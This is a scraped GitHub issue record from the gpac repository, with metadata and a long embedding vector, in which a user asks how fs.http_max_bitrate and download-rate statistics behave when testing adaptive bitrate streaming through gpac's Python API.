https://api.github.com/repos/gpac/gpac/issues/2498/comments
1
2023-06-23T07:40:25
2023-06-23T11:05:59Z
https://github.com/gpac/gpac/issues/2498
1,770,979,868
2,498
false
This is a GitHub Issue repo:gpac owner:gpac Title : I want to ask some questions about python api(ABS) Issue date: --- start body --- 1.I want to test my own Adaptive Bitrate Streaming (ABS). Is fs.http_max_bitrate used to limit the download rate? I set fs.http_max_bitrate=700000, but it did not reflect on stats.total_rate and stats.download_rate. What should I do? 2.For most cases, is the switching of video quality based on stats.total_rate? --- end body ---
470
[ -0.016632897779345512, 0.020918674767017365, -0.018921561539173126, 0.014883600175380707, 0.010408315807580948, -0.0051567815244197845, -0.012347119860351086, 0.04883453622460365, -0.022726280614733696, 0.010750886984169483, -0.01794487051665783, 0.030787624418735504, 0.026982903480529785, -0.0001967958960449323, 0.026545578613877296, 0.022930366918444633, 0.03084593452513218, 0.015102262608706951, 0.0018312950851395726, -0.0069388775154948235, 0.0523039735853672, -0.024081986397504807, -0.011385006830096245, 0.020831210538744926, -0.021822478622198105, 0.02077290043234825, -0.01464307215064764, 0.006643683649599552, -0.02087494172155857, -0.02558346651494503, 0.02244930900633335, 0.022157760336995125, 0.01032814010977745, -0.00858613196760416, 0.01053951308131218, -0.03860114887356758, 0.06484059989452362, 0.033586498349905014, -0.0054082428105175495, 0.012959374114871025, -0.02950480580329895, -0.018367616459727287, -0.029650582000613213, 0.010882084257900715, -0.03489847108721733, 0.0200731810182333, 0.01222321204841137, 0.03513171151280403, 0.02220149151980877, -0.0551903136074543, 0.011363140307366848, -0.011567225679755211, -0.014366100542247295, -0.021589238196611404, -0.00381565373390913, -0.04277030751109123, 0.04469453543424606, -0.022944943979382515, -0.005856500007212162, -0.026224875822663307, 0.02479628287255764, -0.00686598988249898, -0.04148748889565468, 0.010561379604041576, -0.04116678610444069, -0.0016663874266669154, -0.033469878137111664, 0.06828088313341141, -0.03075847029685974, 0.04574411362409592, 0.0007644062861800194, 0.024081986397504807, 0.012689691036939621, 0.018688321113586426, 0.01682240515947342, -0.037639036774635315, 0.022026563063263893, -0.001022245385684073, 0.011479760520160198, 0.008571554906666279, -0.012412718497216702, 0.018571700900793076, -0.00012242799857631326, -0.01986909657716751, 0.011406873352825642, 0.01240542996674776, -0.05921369791030884, -0.06723130494356155, 0.01435152254998684, 0.0012272410094738007, 0.011027858592569828, 0.01995656080543995, 0.035277485847473145, -0.036968473345041275, 0.006793102715164423, 0.02479628287255764, -0.018557123839855194, -0.004526305478066206, -0.020612547174096107, -0.02568550780415535, -0.005812767427414656, 0.008425779640674591, -0.011071591638028622, -0.01986909657716751, 0.041895657777786255, 0.004263910930603743, 0.00987623818218708, -0.031895510852336884, -0.022143183276057243, 0.09277104586362839, 0.002982915611937642, 0.010583246126770973, -0.02548142336308956, 0.0069388775154948235, -0.04408228024840355, 0.026224875822663307, -0.021909942850470543, -0.026006212458014488, 0.02144346386194229, -0.028119945898652077, 0.019038179889321327, -0.003606102429330349, -0.04580242186784744, -0.009919971227645874, -0.001805784530006349, 0.040904391556978226, -0.020262688398361206, 0.013127014972269535, 0.005532151088118553, -0.057056233286857605, -0.008768350817263126, 0.013783001340925694, -0.012915642000734806, -0.036414530128240585, 0.015772826969623566, -0.041225094348192215, -0.005728946998715401, 0.062449898570775986, 0.01680782623589039, -0.03766819089651108, -0.04970918595790863, -0.037959739565849304, 0.04137086868286133, 0.0007065519457682967, -0.01160366926342249, -0.0058346339501440525, 0.01285004336386919, 0.01053951308131218, -0.028994595631957054, 0.04160410910844803, 0.004282132722437382, -0.05454890802502632, -0.017434658482670784, 0.012332542799413204, -0.012288810685276985, 0.0012217744952067733, 0.0015005687018856406, -0.006461465265601873, 0.005546728614717722, 0.026778819039463997, 0.01160366926342249, -0.004027027171105146, 0.04052537679672241, 0.03209959715604782, 0.022026563063263893, -0.008199828676879406, 0.031166639178991318, 0.009963703341782093, -0.026006212458014488, 0.014730537310242653, 0.01339669805020094, -0.02548142336308956, -0.034927625209093094, 0.027624312788248062, -0.022697126492857933, -0.007740638684481382, 0.03927171230316162, 0.008899548090994358, -0.0025455914437770844, 0.014774269424378872, 0.010925816372036934, -0.017697053030133247, 0.029213257133960724, -0.01530634704977274, -0.00005967653123661876, -0.0325077660381794, 0.03478185087442398, -0.04195396974682808, 0.009468069300055504, -0.019562968984246254, 0.04691030830144882, 0.026195719838142395, 0.019242264330387115, -0.0370267815887928, -0.005422820337116718, -0.007893702015280724, -0.01177859865128994, -0.03154565393924713, -0.0018932493403553963, -0.0043878196738660336, -0.0130176842212677, -0.039446644484996796, -0.02121022343635559, -0.008097786456346512, -0.03396551311016083, -0.010189654305577278, 0.019023602828383446, 0.01995656080543995, 0.020335575565695763, -0.016239305958151817, -0.011567225679755211, -0.048513833433389664, 0.0017839183565229177, 0.01908191293478012, -0.00965757668018341, 0.006800391245633364, -0.005896587856113911, -0.006166271399706602, -0.004398752469569445, -0.002062712563201785, 0.02053966000676155, -0.004686657804995775, 0.012507472187280655, -0.0039614285342395306, -0.02637065015733242, -0.013462296687066555, 0.000850960030220449, -0.038426220417022705, -0.007234071381390095, -0.008564265444874763, 0.03475269675254822, 0.01782825030386448, -0.030816778540611267, 0.029592271894216537, -0.005677925888448954, 0.003033936722204089, 0.001132487435825169, 0.013651804067194462, -0.015160572715103626, -0.011669267900288105, -0.016734939068555832, 0.046735379844903946, -0.003928629215806723, -0.011559936217963696, 0.01749296858906746, 0.01849881373345852, 0.02074374444782734, 0.012988529168069363, -0.015860291197896004, -0.01447543129324913, 0.009329583495855331, -0.03510255739092827, 0.0322745256125927, 0.011552647687494755, -0.03941749036312103, -0.003436639439314604, 0.009847083128988743, 0.015029375441372395, -0.015874868258833885, -0.05798919126391411, 0.011385006830096245, 0.003403840120881796, -0.0011926195584237576, -0.018484236672520638, -0.004963629879057407, -0.031691428273916245, 0.002144710859283805, 0.00032275437843054533, -0.008782927878201008, -0.0018968937220051885, 0.003675345564261079, 0.018119798973202705, -0.022609662264585495, 0.06973863393068314, -0.02997128665447235, 0.028688468039035797, 0.006618172861635685, -0.023178182542324066, 0.03513171151280403, -0.002075467724353075, -0.016574587672948837, 0.012485606595873833, 0.004544527269899845, 0.03600636124610901, 0.005561306141316891, -0.01749296858906746, 0.004927186295390129, -0.02511698752641678, -0.05801834538578987, -0.00937331560999155, 0.022070294246077538, 0.0206562802195549, -0.024169450625777245, -0.014570184983313084, 0.0038411642890423536, 0.01895071566104889, -0.006355778314173222, 0.0026148343458771706, 0.016224728897213936, 0.000761217437684536, -0.028557270765304565, 0.01099870353937149, 0.015000220388174057, -0.03548157215118408, -0.008156096562743187, -0.01906733587384224, -0.005313489120453596, 0.05326608940958977, 0.03294508904218674, -0.018644588068127632, 0.03536495193839073, -0.05428651347756386, -0.041574954986572266, -0.03355734422802925, 0.02322191558778286, 0.03734748810529709, -0.014752402901649475, -0.03183720260858536, -0.030029594898223877, -0.00875377282500267, 0.009212963283061981, 0.033586498349905014, -0.03565650060772896, 0.03166227415204048, -0.003487660549581051, -0.028003327548503876, 0.0006910633528605103, -0.016326770186424255, -0.018761208280920982, 0.0027296319603919983, 0.008192540146410465, -0.010437470860779285, -0.02848438359797001, -0.0166037417948246, -0.0004705790779553354, -0.05037974938750267, -0.037755656987428665, -0.0049818516708910465, 0.017420081421732903, 0.01804691180586815, 0.010167787782847881, -0.02414029650390148, 0.026049945503473282, -0.0009502690518274903, 0.026662198826670647, -0.014424409717321396, -0.02715783379971981, 0.04440298303961754, 0.01161095779389143, 0.03017537109553814, 0.0009739574743434787, 0.042595379054546356, 0.0068222577683627605, 0.03591889515519142, 0.019344307482242584, -0.013542473316192627, -0.004216534085571766, -0.04017551615834236, -0.006650972180068493, -0.013221768662333488, 0.02660388872027397, -0.012478317134082317, -0.012930219061672688, 0.06180848926305771, -0.010692576877772808, 0.029461074620485306, -0.012820888310670853, -0.007015409413725138, 0.03137072175741196, -0.011093457229435444, 0.00015146906662266701, -0.007944723591208458, -0.006075161974877119, 0.028761355206370354, -0.06134200841188431, 0.024825436994433403, -0.006858701352030039, -0.003527748631313443, -0.06798933446407318, 0.004883453715592623, -0.026662198826670647, -0.01094039436429739, 0.030321145430207253, -0.003680812194943428, 0.01526261493563652, -0.005648770835250616, 0.013549761846661568, 0.032012131065130234, -0.015874868258833885, 0.0121211688965559, -0.027084946632385254, -0.028426073491573334, -0.012653247453272343, -0.03242029994726181, -0.020568815991282463, 0.005145848263055086, -0.03329494968056679, -0.03183720260858536, -0.0010668887989595532, -0.0475517176091671, 0.03994227945804596, -0.00784268043935299, 0.015393812209367752, 0.027070367708802223, 0.0020517793018370867, 0.02379043772816658, -0.0019497370813041925, -0.015889447182416916, 0.018003180623054504, -0.012172190472483635, -0.01363722700625658, -0.026735085994005203, -0.02220149151980877, 0.011304831132292747, 0.01628303714096546, 0.048951156437397, -0.031050018966197968, 0.005801834631711245, -0.004205601289868355, 0.007995744235813618, -0.004894386976957321, 0.01795944757759571, 0.0027095878031104803, 0.0019369818037375808, 0.01672036200761795, 0.004191023763269186, -0.016020644456148148, 0.03994227945804596, -0.0037864986807107925, -0.006902433931827545, 0.02491290308535099, -0.027522269636392593, -0.021166492253541946, 0.0037573438603430986, 0.02435895800590515, 0.018994448706507683, -0.020816631615161896, -0.01070715393871069, -0.005896587856113911, -0.04565664753317833, -0.03839706629514694, -0.0204230397939682, 0.03979650139808655, 0.023046985268592834, 0.011997261084616184, -0.04151664674282074, -0.03982565924525261, -0.047639183700084686, 0.02323649264872074, -0.02411114051938057, 0.001887782826088369, 0.011086168698966503, 0.01871747523546219, -0.01950465887784958, -0.01290835253894329, -0.039096783846616745, -0.004854298662394285, 0.005054738838225603, 0.03029198944568634, -0.04186650365591049, -0.022157760336995125, -0.010976837947964668, 0.015335502102971077, 0.024752549827098846, 0.03734748810529709, -0.007419934030622244, -0.05212904512882233, -0.0334407240152359, 0.013010394759476185, -0.021181069314479828, -0.043819885700941086, -0.0073251803405582905, 0.062100037932395935, 0.024256916716694832, 0.009788773953914642, 0.020364731550216675, 0.009890816174447536, -0.05040890350937843, 0.011399584822356701, -0.015058530494570732, 0.010298985056579113, -0.02739107236266136, 0.05516115948557854, 0.010692576877772808, -0.0038010762073099613, -0.013724691234529018, -0.035044245421886444, 0.03341156989336014, 0.0020499571692198515, -0.028775932267308235, -0.0164871234446764, 0.02491290308535099, 0.05486961081624031, 0.0021064449101686478, -0.0032416656613349915, 0.014482719823718071, 0.0014969243202358484, 0.0015361013356596231, 0.014941910281777382, -0.02087494172155857, -0.007755215745419264, -0.0006045096088200808, -0.02938818745315075, -0.004610125906765461, 0.036531150341033936, 0.037172555923461914, -0.020218955352902412, 0.038980163633823395, -0.043353404849767685, -0.014446276240050793, -0.032012131065130234, 0.0006231869920156896, -0.03402382507920265, -0.032595232129096985, -0.020816631615161896, -0.027770087122917175, -0.016355926170945168, -0.034257061779499054, 0.027449382469058037, 0.003793787444010377, -0.021370576694607735, -0.023426000028848648, -0.026093678548932076, 0.022041140124201775, 0.01173486653715372, 0.0016718540573492646, -0.014861734583973885, -0.003976006060838699, 0.02680797316133976, -0.02097698487341404, -0.02479628287255764, -0.014664938673377037, -0.002540124813094735, 0.029359031468629837, 0.010109477676451206, 0.0026603888254612684, -0.002350617665797472, 0.03600636124610901, 0.005605038721114397, 0.008323737420141697, -0.044490449130535126, 0.041924815624952316, -0.02087494172155857, 0.031341567635536194, -0.030437765643000603, 0.0010149566223844886, 0.00729602575302124, 0.008775639347732067, -0.005871077533811331, -0.020627126097679138, 0.005164070054888725, -0.036647770553827286, 0.016312193125486374, 0.018250996246933937, 0.02186620980501175, -0.001957025844603777, 0.021166492253541946, -0.003050336381420493, -0.001730163930915296, -0.0016153663164004683, -0.009008878841996193, 0.05072961002588272, 0.012150323949754238, -0.007135673426091671, 0.01223050057888031, 0.0002958771656267345, -0.010510358028113842, 0.004664791747927666, -0.002777008805423975, -0.01418388169258833, -0.010124055668711662, -0.02570008672773838, 0.011968106031417847, 0.02346973307430744, -0.024490155279636383, -0.0005721658235415816, 0.018790364265441895, 0.009934548288583755, -0.033586498349905014, 0.00920567475259304, 0.0066874162293970585, -0.037872277200222015, 0.002312351716682315, 0.0034949493128806353, 0.016662051901221275, 0.012179479002952576, 0.014847156591713428, -0.016851559281349182, -0.010284407995641232, -0.041225094348192215, 0.003917695954442024, 0.010094900615513325, -0.03979650139808655, -0.005805478896945715, 0.02265339344739914, -0.022638816386461258, 0.0028152745217084885, 0.003946851007640362, 0.009008878841996193, 0.017084799706935883, -0.004683013539761305, 0.004967274144291878, -0.0037682768888771534, -0.022711703553795815, -0.034286219626665115, 0.0010841996408998966, 0.002312351716682315, 0.011807753704488277, -0.04099185764789581, 0.01481071300804615, 0.03892185539007187, 0.03277016058564186, 0.08519075810909271, -0.02223064750432968, -0.004169157240539789, 0.009613843634724617, -0.015845714136958122, 0.011421450413763523, 0.015845714136958122, 0.016341347247362137, 0.03285762667655945, -0.01819268800318241, 0.03256607428193092, -0.031691428273916245, -0.018032334744930267, 0.03163311630487442, -0.005306200589984655, -0.03868861496448517, -0.004176446236670017, -0.009001590311527252, -0.025087831541895866, 0.002711410168558359, -0.0027041214052587748, -0.03880523517727852, -0.01661832071840763, 0.003881252370774746, 0.02253677509725094, 0.012164901942014694, -0.015758249908685684, -0.004347731359302998, -0.0222160704433918, -0.004478928633034229, -0.020000293850898743, 0.06775609403848648, -0.009963703341782093, 0.009110921062529087, -0.011742155067622662, 0.003591525135561824, -0.004978207405656576, 0.010605111718177795, -0.031020862981677055, -0.018877828493714333, -0.010473914444446564, 0.012820888310670853, 0.00622458104044199, -0.032128751277923584, 0.01849881373345852, -0.0016272105276584625, -0.014431699179112911, -0.02377585880458355, -0.011406873352825642, -0.02253677509725094, 0.005546728614717722, -0.041808195412158966, 0.005645126570016146, 0.023076141253113747, -0.0029136724770069122, -0.02481085993349552, -0.008316448889672756, 0.043353404849767685, 0.0007575730560347438, -0.025437692180275917, 0.027172410860657692, 0.030700160190463066, -0.01795944757759571, -0.003622502088546753, -0.015495854429900646, 0.0005985875031910837, -0.0028207411523908377, -0.04956341162323952, 0.00030088817584328353, -0.0077916597947478294, -0.014001663774251938, 0.009650287218391895, -0.018586277961730957, 0.006242803297936916, -0.0021337775979191065, 0.0073324693366885185, 0.0014322367496788502, -0.029533961787819862, 0.041021011769771576, 0.03711424767971039, 0.007849969901144505, 0.04422805458307266, 0.0016909869154915214, 0.019227687269449234, 0.01173486653715372, 0.012711556628346443, -0.004573682323098183, -0.003560547949746251, -0.02469423972070217, 0.011290253140032291, 0.0010723554296419024, -0.015743670985102654, 0.0051494925282895565, 0.018032334744930267, -0.0036334353499114513, -0.01682240515947342, -0.016574587672948837, 0.00034188732388429344, 0.010466625913977623, 0.022303534671664238, -0.0166037417948246, 0.0006865079049021006, -0.020044026896357536, 0.009212963283061981, -0.0166037417948246, -0.028907129541039467, -0.03612298145890236, 0.008680885657668114, 0.030350299552083015, 0.019679589197039604, -0.005382732022553682, -0.023061564192175865, -0.025977058336138725, 0.003664412535727024, 0.010175076313316822, 0.0242423377931118, -0.011151767335832119, 0.008644442074000835, -0.02479628287255764, -0.02029184252023697, 0.02578755095601082, 0.009613843634724617, -0.006618172861635685, 0.005820056423544884, -0.014883600175380707, 0.03982565924525261, 0.008192540146410465, -0.01682240515947342, -0.00526975654065609, -0.012412718497216702, -0.006089739501476288, -0.004431551788002253, -0.03061269409954548, 0.016982756555080414, -0.014825291000306606, 0.02513156458735466, -0.019708745181560516, -0.04087523743510246, -0.00446070684120059, 0.010452048853039742, 0.02154550515115261, -0.03128325939178467, -0.035277485847473145, 0.0068149687722325325, 0.025612620636820793, 0.004868876188993454, -0.02278459072113037, 0.04787242412567139, -0.01537923514842987, 0.04198312386870384, 0.006559863220900297, -0.002674966352060437, -0.01222321204841137, -0.01883409544825554, -0.019941983744502068, 0.0019424483180046082, 0.02030642144382, -0.010903949849307537, -0.010554091073572636, 0.03667692467570305, -0.015277191996574402, -0.025102410465478897, 0.020787477493286133, 0.027857551351189613, -0.01048849243670702, -0.004857942927628756, -0.006374000571668148, 0.012799021787941456, -0.01658916473388672, 0.0022777302656322718, -0.021851632744073868, 0.011975394561886787, 0.026428960263729095, -0.021049872040748596, 0.022609662264585495, 0.0073762014508247375, 0.007908279076218605, -0.010313563048839569, 0.028134524822235107, -0.007529265247285366, 0.009606555104255676, -0.03521917760372162, 0.015218882821500301, -0.00998556986451149, -0.0004906231188215315, 0.01290106400847435, 0.0069898986257612705, -0.000307038048049435, 0.05594834312796593, 0.009606555104255676, 0.016122685745358467, -0.02825114317238331, 0.0003746866132132709, -0.018309306353330612, -0.035277485847473145, -0.005674281623214483, -0.030700160190463066, 0.0413125604391098, -0.010838351212441921, -0.0008013055194169283, 0.01604979857802391, 0.012886486947536469, -0.02446100115776062, -0.016793249174952507, 0.025641776621341705, -0.026982903480529785, 0.000032827785616973415, 0.024971213191747665, -0.036618612706661224, 0.02828029915690422, 0.00524789048358798, 0.013819444924592972, 0.013105148449540138, -0.01774078607559204, -0.019723322242498398, 0.03691016510128975, 0.03591889515519142, 0.00874648429453373, 0.007212204858660698, 0.023863324895501137, -0.027449382469058037, 0.017886560410261154, -0.04352833703160286, 0.007062785793095827, -0.022493042051792145, -0.03839706629514694, -0.014249480329453945, 0.03994227945804596, -0.012689691036939621, -0.001793940318748355, -0.021618394181132317, -0.008979723788797855, 0.009919971227645874, -0.024825436994433403, 0.02769719995558262, -0.00477047823369503, 0.02074374444782734, 0.03647283837199211, 0.005236957222223282, 0.008476801216602325, 0.03519001975655556, 0.012602225877344608, -0.047172702848911285, 0.023848745971918106, 0.011377718299627304, -0.010634266771376133, 0.013571628369390965, -0.012492895126342773, -0.01070715393871069, -0.015189727768301964, -0.026560157537460327, -0.023542620241642, -0.0037026782520115376, -0.02277001366019249, -0.007514687720686197, -0.05349932983517647, -0.010452048853039742, -0.02087494172155857, -0.018265575170516968, -0.017799096181988716, 0.01583113707602024, -0.023251069709658623, -0.012660535983741283, -0.004333153832703829, 0.0007275070529431105, -0.0016007887898012996, -0.016122685745358467, 0.002889984054490924, -0.0015798336826264858, -0.005422820337116718, -0.016399657353758812, 0.02109360508620739, 0.01740550436079502, -0.035743966698646545, -0.01603522151708603, 0.01078004203736782, -0.009460780769586563, 0.019883673638105392, 0.030875088647007942, 0.005590461194515228, -0.006235514301806688, -0.0012618625769391656, 0.0019369818037375808, 0.02648727037012577, 0.014737825840711594, -0.0010322673479095101, -0.01239085290580988, -0.013301944360136986, -0.011807753704488277, -0.017186840996146202, 0.021341420710086823, -0.017930293455719948, 0.03230367973446846, -0.003114112885668874, 0.01873205415904522, 0.017084799706935883, -0.0052223801612854, -0.004322221037000418, -0.012609514407813549, 0.002345151035115123, -0.004876164719462395, -0.01115905586630106, -0.01508768554776907, -0.004446129314601421, -0.005863788537681103, -0.026385227218270302, 0.0325077660381794, 0.02871762216091156, 0.0011005993001163006, 0.0018458726117387414, 0.015408389270305634, 0.020379308611154556, -0.02288663387298584, -0.013469585217535496, -0.014898178167641163, -0.020379308611154556, 0.006381289102137089, -0.015889447182416916, 0.0016026110388338566, -0.0035641922149807215, -0.014089128002524376, -0.013549761846661568, -0.03545241430401802, -0.02344057708978653, -0.009176519699394703, 0.0007311514345929027, -0.026210296899080276, -0.003848453052341938, 0.006326623726636171, -0.0068222577683627605, 0.04087523743510246, -0.012638669461011887, 0.0041217808611691, 0.0066473279148340225, -0.014825291000306606, 0.003775565652176738, -0.027959594503045082, -0.004967274144291878, -0.011713000014424324, -0.0014686804497614503, -0.022288957610726357, -0.019912829622626305, -0.01771163009107113, 0.015656206756830215, -0.014446276240050793, -0.005801834631711245, 0.014329656958580017, 0.01806149072945118, -0.019140223041176796, 0.009949125349521637, -0.007117451634258032, -0.003589702770113945, -0.008688174188137054, -0.01774078607559204, -0.02174959145486355, 0.001548856613226235, -0.028411496430635452, -0.025947902351617813, 0.003318197326734662, -0.03545241430401802, 0.005779968108981848, 0.017799096181988716, -0.00887039303779602, 0.04793073236942291, -0.008943280205130577, -0.009759618900716305, -0.01160366926342249, -0.020160645246505737, 0.012092014774680138, -0.0020517793018370867, 0.0336739644408226, -0.035277485847473145, 0.005502996500581503, -0.03005875088274479, 0.0111080352216959, 0.0027988748624920845, 0.0009402470313943923, -0.01975247636437416, -0.00846951175481081, -0.014541029930114746, 0.033382415771484375, -0.05250805988907814, 0.012667824514210224, -0.011479760520160198, 0.009890816174447536, -0.001183508662506938, -0.021909942850470543, -0.014322367496788502, -0.008965146727859974, -0.02973804622888565, -0.024840015918016434, -0.010313563048839569, 0.03839706629514694, 0.028790511190891266, 0.018090644851326942, 0.009096344001591206, -0.013258212246000767, 0.021735012531280518, -0.03880523517727852, -0.0408460795879364, -0.00874648429453373, -0.016851559281349182, -0.015743670985102654, 0.017915714532136917, 0.010102189145982265, -0.029883820563554764, 0.007339757867157459, 0.004008805379271507, -0.01906733587384224, -0.019140223041176796, -0.002179332310333848, -0.002263152739033103, 0.005849211476743221, 0.00879750493913889, -0.029125792905688286, 0.016239305958151817, 0.024271493777632713, 0.04361579939723015, -0.014001663774251938, -0.015962334349751472, 0.0149273332208395, -0.004300354514271021, -0.01795944757759571, -0.024271493777632713, -0.029140369966626167, -0.06239158660173416, -0.02949022874236107, 0.004963629879057407, 0.023076141253113747, 0.0012682401575148106, -0.047843270003795624, -0.005200513638556004, -0.0011151767103001475, 0.008549688383936882, -0.006308401934802532, 0.013455008156597614, -0.01435881108045578, 0.013622649013996124, -0.009001590311527252, 0.017186840996146202, 0.044257208704948425, 0.0009247584966942668, 0.0033619299065321684, -0.013921487145125866, -0.014526452869176865, 0.006330267991870642, 0.015525009483098984, 0.011596380732953548, -0.015131417661905289, -0.028892552480101585, 0.026181142777204514, 0.00667648296803236, -0.0254522692412138, 0.006811324506998062, 0.020044026896357536, 0.03198297694325447, 0.004559104796499014, 0.032012131065130234, -0.011421450413763523, -0.0013948819832876325, -0.0008432157337665558, -0.0022777302656322718, 0.0057435245253145695, -0.030146215111017227, 0.0076750400476157665, -0.02444642409682274, 0.005732591729611158, -0.023046985268592834, -0.0030740248039364815, -0.03195382282137871, 0.019460927695035934, 0.008535110391676426, -0.019388040527701378, 0.027566002681851387, 0.005229668691754341, 0.009161942638456821, 0.002011691452935338, -0.004697591066360474, -0.017784517258405685, -0.001142509514465928, -0.010342717170715332, -0.0026458115316927433, -0.01401624083518982, -0.005215091165155172, 0.0026840772479772568, 0.057493556290864944, 0.0076240189373493195, -0.0036899230908602476, -0.0011971750063821673, 0.007215849589556456, -0.008527821861207485, 0.001744741341099143, 0.042012277990579605, 0.0008131496724672616, -0.005863788537681103, -0.0025765683967620134, 0.019431771710515022, -0.0020481350366026163, -0.006067873444408178, 0.014336945489048958, -0.017784517258405685, 0.004868876188993454, 0.0021009782794862986, -0.013046839274466038, 0.007740638684481382, 0.008374758996069431, 0.019592124968767166, 0.032799314707517624, -0.02030642144382, 0.006756659131497145, -0.0013092393055558205, -0.032711852341890335, 0.018338462337851524, -0.0022321755532175303, -0.005171358585357666, -0.0006924300105310977, -0.016968179494142532, 0.0018841384444385767, 0.012886486947536469, -0.000032172938517760485, 0.0015233459416776896, 0.024752549827098846, -0.007864546962082386, 0.002667677588760853, -0.016982756555080414, 0.0022431088145822287, -0.01015321072191, -0.006785814184695482, 0.004526305478066206, -0.01603522151708603, -0.020831210538744926, 0.026662198826670647, 0.015481277368962765, 0.005309844855219126, -0.011304831132292747, -0.0009138253517448902, 0.0006933410768397152, -0.016180995851755142, 0.01419117022305727, 0.007551131304353476, 0.00010329506767448038, -0.018600856885313988, 0.01161824632436037, 0.019227687269449234, -0.031050018966197968, 0.03096255473792553, 0.01693902350962162, 0.019009025767445564, 0.02253677509725094, 0.002212131628766656, -0.008957857266068459, -0.008403913117945194, 0.030816778540611267, -0.0058856550604105, 0.01693902350962162, -0.01111532375216484, 0.00620271498337388, 0.029125792905688286, -0.012930219061672688, -0.009285850450396538, -0.0006395866512320936, -0.028994595631957054, 0.018600856885313988, 0.0271286778151989, -0.0040780482813715935, 0.007339757867157459, 0.0039104074239730835, -0.021122759208083153, 0.02142888680100441, -0.030379455536603928, 0.0048470101319253445, -0.0045554605312645435, -0.014985643327236176, 0.029810933396220207, -0.012631380930542946, -0.0005384554388001561, 0.01207014825195074, 0.008906836621463299, 0.019781632348895073, 0.0005316222668625414, 0.021822478622198105, -0.0027369207236915827, -0.003436639439314604, 0.020700013265013695, -0.014045395888388157, 0.006410444155335426, 0.010262541472911835, 0.036414530128240585, 0.007470955140888691, 0.0023360401391983032, 0.01604979857802391, -0.039446644484996796, 0.013367542997002602, 0.015393812209367752, -0.009810639545321465, -0.011144478805363178, 0.000415230228099972, 0.015568741597235203, -0.046618759632110596, -0.004945408087223768, -0.008170673623681068, -0.012959374114871025, 0.00231417384929955, 0.01852796971797943, -0.004657502751797438, -0.027857551351189613, 0.005998630542308092, 0.00443519651889801, -0.0016436101868748665, 0.008957857266068459, -0.010954971425235271, -0.0271286778151989, -0.0039541395381093025, 0.022172337397933006, 0.027770087122917175, -0.015904024243354797, 0.00908176600933075, 0.019125645980238914, 0.0023378622718155384, 0.04099185764789581, 0.011363140307366848, -0.001924226526170969, 0.0027004769071936607, 0.022055717185139656, 0.00846951175481081, -0.015058530494570732, 0.0339072048664093, 0.0019351596711203456, 0.0059621864929795265, 0.01717226393520832, 0.012696979567408562, 0.008899548090994358, -0.0066546169109642506, 0.007551131304353476, -0.009074477478861809, -0.011596380732953548, -0.011625534854829311, 0.015218882821500301, 0.012274232693016529, 0.03061269409954548, -0.014839868061244488, 0.012784444727003574, -0.017084799706935883, -0.018090644851326942, 0.018207265064120293, -0.006067873444408178, 0.026108255609869957, 0.010969548486173153, 0.007711483631283045, 0.031224949285387993, -0.0014477253425866365, -0.014438987709581852, -0.0675811693072319, -0.001650898833759129, -0.01492004469037056, 0.010714443400502205, 0.00262394524179399, -0.005138559266924858, -0.00970130879431963, 0.018600856885313988, -0.0029592271894216537, -0.0168369822204113, -0.049971580505371094, -0.005728946998715401, -0.004158224444836378, 0.00035327597288414836, 0.007820814847946167, -0.008331025950610638, -0.004606481641530991, 0.04218721017241478, 0.013389409519731998, -0.023265648633241653, 0.0166037417948246, -0.005058383569121361, 0.011887929402291775, 0.01973789930343628, 0.02692459337413311, -0.03699762746691704, -0.019839942455291748, -0.013578916899859905, -0.0009930904489010572, 0.01737634837627411, 0.001524257124401629, 0.007543842773884535, -0.0038520973175764084, -0.0008044943097047508, 0.0021483551245182753, -0.0008787483093328774, -0.008775639347732067, 0.04341171681880951, -0.018265575170516968, 0.011078880168497562, 0.005076605360955, -0.01508768554776907, 0.0011197321582585573, 0.011173633858561516, 0.005940320435911417, -0.004274844191968441, 0.024271493777632713, -0.0025291917845606804, 0.00479234429076314, 0.007930145598948002, -0.035627346485853195, -0.0016454323194921017, 0.0006951632676646113, -0.00937331560999155, 0.0014495475916191936, 0.005776323843747377, 0.004132713656872511, -0.0014021707465872169, -0.00010073262092191726, 0.027886707335710526, -0.0043805306777358055, 0.0012390852207317948, 0.0013803045731037855, -0.006406799890100956, 0.006636394653469324, 0.017871983349323273, 0.000030635470466222614, 0.012303387746214867, 0.009577400051057339, 0.002110089408233762, -0.008761061355471611, 0.0254522692412138, -0.011078880168497562, 0.008644442074000835, 0.008207117207348347, -0.018148954957723618, 0.005703436676412821, -0.014373389072716236, -0.00018176287994720042, 0.010408315807580948, 0.023149028420448303, 0.006239158567041159, 0.0015843891305848956, -0.007973877713084221, 0.0166037417948246, -0.01451916340738535, -0.017988601699471474, 0.006210003979504108, 0.027857551351189613, 0.008695462718605995, 0.0029974929057061672, 0.01508768554776907, -0.037201713770627975, -0.0016536321491003036, -0.008323737420141697, -0.020597970113158226, -0.011559936217963696, -0.03588974103331566, 0.004194668028503656, 0.0007211294141598046, 0.017974024638533592, -0.0068987892009317875, 0.0038083649706095457, -0.012055570259690285, 0.01784282736480236, 0.014322367496788502, 0.010029301978647709, -0.005677925888448954, -0.006330267991870642, 0.00684412382543087, -0.0022722636349499226, -0.031808048486709595, 0.003287220373749733, 0.0004801455361302942, 0.009008878841996193, -0.00493447482585907, 0.002826207783073187, -0.013943353667855263, 0.010721731930971146, -0.0017556744860485196, 0.017011912539601326, -0.005510285031050444, 0.0012436406686902046, 0.009322294034063816, 0.011683844961225986, 0.027872130274772644, -0.004099914338439703, 0.03851368650794029, 0.006013208068907261, -0.03186635673046112, 0.04020467400550842, -0.0008013055194169283, -0.010466625913977623, 0.026414381340146065, -0.00701176468282938, 0.0035168156027793884, 0.008768350817263126, -0.005255179014056921, 0.0024617707822471857, -0.010124055668711662, 0.01647254452109337, 0.025641776621341705, 0.011552647687494755, 0.03845537453889847, -0.0413125604391098, -0.005404598545283079, -0.01289377547800541, -0.025875015184283257, 0.018236419185996056, -0.006683771498501301, -0.006217292509973049, -0.0033090864308178425, -0.010889372788369656, 0.02010233700275421, -0.005375443492084742, -0.014694093726575375, -0.020175224170088768, 0.0022759081330150366, 0.002687721746042371, -0.0032799316104501486, 0.007099229842424393, -0.02086036466062069, 0.015131417661905289, 0.013156170025467873, -0.010401027277112007, 0.012922930531203747, -0.0013137947535142303, -0.0032562431879341602, -0.011290253140032291, -0.005280689802020788, -0.0013538828352466226, -0.01526261493563652, -0.005860144272446632, -0.016414234414696693, 0.0053681544959545135, -0.016778672114014626, 0.0025966125540435314, 0.007117451634258032, 0.014293212443590164, 0.014562896452844143, -0.016909869387745857, 0.0035186377353966236, -0.006585373543202877, -0.0009129142854362726, 0.02086036466062069, -0.015787404030561447, 0.0039614285342395306, -0.017449235543608665, 0.020350152626633644, 